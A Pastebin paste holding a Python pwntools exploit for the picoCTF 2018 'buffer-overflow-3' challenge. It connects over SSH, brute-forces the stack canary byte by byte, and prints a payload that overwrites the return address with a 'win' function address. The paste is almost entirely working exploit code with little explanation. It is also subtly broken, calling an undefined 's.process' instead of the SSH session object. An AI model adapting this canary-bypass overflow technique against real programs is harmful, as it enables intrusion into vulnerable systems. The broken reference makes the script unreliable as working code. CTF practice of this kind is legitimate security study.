Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import sys
- # context.log_level = 'debug'
- win = '\xeb\x86\x04\x08'
- firstPart = 'A' * 32
- #exploit should be 32 random bytes + canary (4 bytes) + 12 bytes to fill up the remaining space under ebp + 4 bytes to fill ebp + win address: 56 bytes total
- middlePart = 'A' * 16
- canary = ''
- remoteShell = ssh(host = '2018shell1.picoctf.com', user=sys.argv[1], password=sys.argv[2])
- remoteShell.set_working_directory('/problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf')
- for i in range(0, 4):
- for j in range(256):
- p=s.process('./vuln')
- p.sendlineafter('>', str(i + 32 + 1))
- p.sendafter('>', firstPart + canary + chr(j))
- response = p.recvall()
- if 'Stack Smashing' not in response:
- canary += chr(j)
- break
- print firstPart + canary + middlePart + win
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement